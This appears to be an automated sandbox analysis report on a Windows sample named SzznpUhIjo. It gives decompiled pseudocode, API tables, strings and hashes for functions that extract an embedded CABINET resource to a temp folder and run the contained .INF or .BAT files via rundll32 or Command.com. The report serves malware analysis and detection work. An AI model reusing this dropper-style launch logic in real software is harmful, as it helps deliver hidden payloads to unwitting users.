					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00401680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E004066C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E004066C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00401680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00401781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E004016B3( &_v1552, 0x400, " ");
										E004016B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00402AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0040171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00401A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00401A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E004044B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x409120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x401140, _t156, 8,  &_v268) == 0) {
										 *0x409a34 =  *0x409a34 & 0xfffffffb;
										if( *0x409a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0040171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x409a34 =  *0x409a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00401680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00401680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00406CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00401af3
0x00401afa
0x00401b07
0x00401b09
0x00401b1a
0x00401b20
0x00401b2c
0x00401b3b
0x00401b40
0x00401b2e
0x00401b2e
0x00401b33
0x00401b33
0x00401b46
0x00401b4c
0x00401b52
0x00401b57
0x00401b5d
0x00401b61
0x00401b9f
0x00401b9f
0x00401bb1
0x00401bc2
0x00000000
0x00401b63
0x00401b63
0x00401b65
0x00401b68
0x00401b68
0x00401b6a
0x00401b6b
0x00401b6f
0x00401b74
0x00000000
0x00000000
0x00401b76
0x00401b7b
0x00401b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b8c
0x00401b8c
0x00401b98
0x00401bc7
0x00401bc9
0x00401bcc
0x00401bd3
0x00401d75
0x00401d76
0x00401d78
0x00401d7f
0x00401e05
0x00401e09
0x00000000
0x00000000
0x00401e12
0x00401e1b
0x00401e73
0x00401e21
0x00401e21
0x00401e28
0x00401e37
0x00401e3e
0x00401e52
0x00401e60
0x00401e60
0x00401e3e
0x00401e79
0x00401e7b
0x00401e84
0x00000000
0x00401d9b
0x00401d9b
0x00401da0
0x00401da2
0x00401da5
0x00401da5
0x00401da7
0x00401da8
0x00401dac
0x00401dae
0x00401db4
0x00401db7
0x00401db7
0x00401db9
0x00401dba
0x00401dbe
0x00401dc3
0x00401dce
0x00401dd2
0x00401deb
0x00000000
0x00401df0
0x00000000
0x00401dd2
0x00401bf7
0x00401bfe
0x00401c07
0x00401d55
0x00401d5a
0x00401d5b
0x00401d5d
0x00401d5e
0x00000000
0x00401c1b
0x00401c1b
0x00401c20
0x00401c2c
0x00401c33
0x00401c38
0x00401c3a
0x00401c3a
0x00401c40
0x00401c4b
0x00401c4b
0x00401c5d
0x00401c61
0x00401dd4
0x00401dd4
0x00401dd6
0x00401ddb
0x00401ddc
0x00401dde
0x00401d64
0x00401d64
0x00401d67
0x00401d6c
0x00000000
0x00401c67
0x00401c67
0x00401c6d
0x00401c72
0x00401c74
0x00401c74
0x00401c8e
0x00401c99
0x00401cc0
0x00401cf8
0x00401d07
0x00401d23
0x00401d09
0x00401d14
0x00401d1b
0x00401d1b
0x00401d2b
0x00401d2d
0x00401d2d
0x00401d38
0x00401d39
0x00401d46
0x00401cc2
0x00401cc2
0x00401ccc
0x00401cce
0x00401cce
0x00401cdb
0x00401ce6
0x00401cee
0x00401cee
0x00401e89
0x00401e91
0x00401e92
0x00401e94
0x00401e97
0x00401ea4
0x00401ea4
0x00401c61
0x00401c07
0x00401bd3
0x00401b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00401C57
GetPrivateProfileIntA.KERNEL32 ref: 00401C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00401140,00000000,00000008,?), ref: 00401CB8
GetShortPathNameA.KERNEL32 ref: 00401D1B

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

Command.com /c %s, xrefs: 00401D9B, 00401DE8
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00401BA0
.INF, xrefs: 00401BDB
DefaultInstall, xrefs: 00401C74, 00401C87, 00401CCE, 00401CD3, 00401D2D, 00401D39
setupapi.dll, xrefs: 00401D23, 00401D3A
setupx.dll, xrefs: 00401D14
Reboot, xrefs: 00401C82
.BAT, xrefs: 00401D83
AdvancedINF, xrefs: 00401CAE
", xrefs: 00401B25
Version, xrefs: 00401CB3
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00401D3B

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-3368923722
Opcode ID: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
Instruction ID: 1854ec0ea07248ced4697d7887c5e08e33d5be07c387e2280b7d80fdedc59c7f
Opcode Fuzzy Hash: c5cde542d379b8b3dcabaeaf6ab9f809cbf586cc6fbce848f7e7d0055dd29b84
Instruction Fuzzy Hash: 02A15870A002186BEB209B24CC44FEA3769AF55314F1442BBF955B72E1DBBC9D86CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x408004; // 0xee8c6708
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x409124 = E00406285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E004044B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x409a34 & 0x00000008;
							if(( *0x409a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x409a38; // 0x0
								_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x409124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0040268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x409a38; // 0x0
							_t110 =  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x4089e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x409a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E004044B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x409124 = E00406285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E004044B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x409124 = E00406285();
					_t66 = 0;
					L33:
					return E00406CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0040597d
0x00405988
0x0040598f
0x0040599a
0x004059a6
0x004059a8
0x004059af
0x004059b9
0x004059dd
0x004059e4
0x004059f1
0x004059fe
0x00405a0b
0x00405a13
0x00405a19
0x00405a1b
0x00405ba1
0x00405baf
0x00405bbd
0x00405bd8
0x00405bde
0x00405be3
0x00405bec
0x00405bf0
0x00405bfc
0x00405c02
0x00405c02
0x00405c02
0x00405c04
0x00405c04
0x00000000
0x00405c04
0x00405a27
0x00405a3a
0x00405a46
0x00405a48
0x00405a4a
0x00000000
0x00000000
0x00405a64
0x00405a6a
0x00405a6c
0x00405abc
0x00405ac2
0x00405ac9
0x00405aca
0x00405aca
0x00405acc
0x00405acc
0x00405acf
0x00405ad1
0x00000000
0x00000000
0x00405ad3
0x00405ad6
0x00405ad8
0x00000000
0x00000000
0x00405ada
0x00405adc
0x00405add
0x00405add
0x00405ae0
0x00000000
0x00000000
0x00000000
0x00405ae0
0x00405ae2
0x00405ae4
0x00405ae6
0x00405ae6
0x00405ae6
0x00405ae9
0x00405aeb
0x00405af0
0x00405af6
0x00405af8
0x00405af9
0x00405af9
0x00405afb
0x00000000
0x00000000
0x00405afd
0x00405aff
0x00405b00
0x00405b03
0x00000000
0x00000000
0x00000000
0x00405b03
0x00405b05
0x00405b08
0x00405b20
0x00405b27
0x00405b52
0x00405b52
0x00405b5b
0x00405b62
0x00405b6b
0x00405b6d
0x00405b76
0x00405b7d
0x00405b83
0x00405b7f
0x00405b7f
0x00405b7f
0x00405b6f
0x00405b72
0x00405b72
0x00405b85
0x00405b98
0x00405b9e
0x00405b87
0x00405b8f
0x00405b8f
0x00000000
0x00405b85
0x00405b29
0x00405b33
0x00000000
0x00000000
0x00405b35
0x00405b48
0x00405b4a
0x00000000
0x00405b4a
0x00405b0f
0x00405b16
0x00000000
0x00405b16
0x00405a7c
0x00405a8a
0x00405aa5
0x00405aab
0x00000000
0x004059bb
0x004059c0
0x004059c7
0x004059d1
0x004059d6
0x00405c05
0x00405c14
0x00405c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004059A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 004059AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00405A13
MulDiv.KERNEL32(?,?,00000400), ref: 00405A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00405A64
memset.MSVCRT ref: 00405A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00405A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00405AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00405BFC

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
Instruction ID: 43d5c1b8738d8d9cee642188910e7ae7015c6787622b6f388fd3a53d4582656a
Opcode Fuzzy Hash: 6aaf8c91b5dca31200441e902ea9edd8fd2e2a5f7089ede1390eec398b18bba2
Instruction Fuzzy Hash: E67195B1A0020CAFEB159F60CD85BFB77BCEB48304F0440BAF545B6281D6389E458F69

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00404FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x409144 = E0040468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x409140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x408584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x408584, 0x841), 5);
				}
				_t10 = E00404EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00404CA0, E00404CC0, E00404980, E00404A50, E00404AD0, E00404B60, E00404BC0, 1, 0x409148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x409148; // 0x0
						_t24 =  *0x408584; // 0x0
						E004044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x401140, 0, E00404CD0, 0, 0x409140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x408584; // 0x0
					E004044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x409140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x409140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x4091d8; // 0x0
						if(_t47 == 0) {
							E004044B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x408a38 & 0x00000001) == 0 && ( *0x409a34 & 0x00000001) == 0) {
						SendMessageA( *0x408584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00404fe0
0x00404fe6
0x00404ff9
0x0040500d
0x00405013
0x0040501a
0x00405163
0x00405163
0x00405020
0x00405027
0x00405037
0x00405051
0x00405051
0x00405057
0x0040505e
0x004050a7
0x004050ad
0x004050b4
0x004050e8
0x004050e8
0x004050ee
0x004050ff
0x00405104
0x00405106
0x00000000
0x00405106
0x004050cd
0x004050d3
0x004050da
0x00000000
0x00000000
0x004050dd
0x004050e6
0x00000000
0x00000000
0x00000000
0x00405060
0x00405060
0x00405070
0x00405075
0x00405107
0x00405107
0x0040510e
0x00405111
0x00405117
0x00405117
0x0040511f
0x00405121
0x00405127
0x00405135
0x00405135
0x00405127
0x00405141
0x00405159
0x00405159
0x00000000
0x0040515f

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00404FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00405006
LockResource.KERNEL32(00000000), ref: 0040500D
GetDlgItem.USER32(00000000,00000842), ref: 00405030
ShowWindow.USER32(00000000), ref: 00405037
GetDlgItem.USER32(00000841,00000005), ref: 0040504A
ShowWindow.USER32(00000000), ref: 00405051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00405111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00405159

Strings

*MEMCAB, xrefs: 004050C7
CABINET, xrefs: 00404FE6, 00404FF7

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
Instruction ID: c7e9636301b6909bf0cfcc4fade7c16197fcaa171c04f7cf8e0346fe02231bd7
Opcode Fuzzy Hash: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
Instruction Fuzzy Hash: 6F31C9F0B40706BBE7105F61AF89F67365CE748755F14403AFA41BA2E2DABC9C108A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00402F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x408004; // 0xee8c6708
				_v8 = _t9 ^ _t46;
				if( *0x408a38 != 0) {
					L5:
					_t11 = E00405164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00406CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E004055A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0040658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x40a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x408a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x408a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x408d48 & 0x000000c0;
									if(( *0x408d48 & 0x000000c0) == 0) {
										_t41 =  *0x409a40; // 0x3, executed
										_t26 = E0040256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x408a24; // 0x0
									 *0x409a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x408a38;
										if( *0x408a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00404169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x409a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00403BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x408a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00403B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E004044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x409124 = E00406285();
							goto L16;
						}
						_t59 =  *0x409a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0040621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x408a24;
				if( *0x408a24 != 0) {
					L4:
					_t34 = E00403A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E004051E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x408a38;
				if( *0x408a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00402f1d
0x00402f28
0x00402f2f
0x00402f3d
0x00402f6c
0x00402f6c
0x00402f71
0x00402f73
0x00403041
0x00403041
0x00403043
0x00403053
0x00403053
0x00402f79
0x00402f80
0x00000000
0x00402f86
0x00402f86
0x00402f93
0x00402f9e
0x00402fa0
0x00402fa6
0x00402fb8
0x00402fba
0x00402fbe
0x00402fc6
0x00402fcc
0x00402fd4
0x00402fd6
0x00402fd8
0x00402fe0
0x00402fe6
0x00402fee
0x00402ff0
0x00402ff5
0x00402ff5
0x00402fee
0x00402fd4
0x00402ff8
0x00402ffe
0x00403004
0x00403017
0x0040301c
0x00403024
0x00403054
0x0040305a
0x00403065
0x00403065
0x0040306c
0x0040306e
0x00403075
0x0040307a
0x0040307a
0x0040307c
0x00403081
0x00403087
0x00403089
0x004030a1
0x004030a1
0x004030a9
0x004030ab
0x004030ad
0x004030af
0x004030af
0x004030ad
0x004030b6
0x00000000
0x0040308b
0x0040308b
0x00403091
0x00000000
0x00000000
0x00403093
0x00403098
0x0040309a
0x00000000
0x00000000
0x0040309c
0x00000000
0x0040309c
0x00403089
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00000000
0x00403063
0x0040302b
0x00403032
0x0040303c
0x00000000
0x0040303c
0x00403006
0x0040300c
0x00000000
0x00000000
0x0040300e
0x00403015
0x00000000
0x00000000
0x00000000
0x00403015
0x00402f80
0x00402f3f
0x00402f46
0x00402f5f
0x00402f5f
0x00402f64
0x00402f66
0x00000000
0x00000000
0x00000000
0x00402f66
0x00402f4f
0x00000000
0x00000000
0x00402f55
0x00402f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00402F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00402FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00402FC6
DecryptFileA.ADVAPI32 ref: 00402FE6
FreeLibrary.KERNEL32(00000000), ref: 00402FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040301C

Part of subcall function 004051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00402FDB, 00403017
advapi32.dll, xrefs: 00402F99
DecryptFileA, xrefs: 00402FC0

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

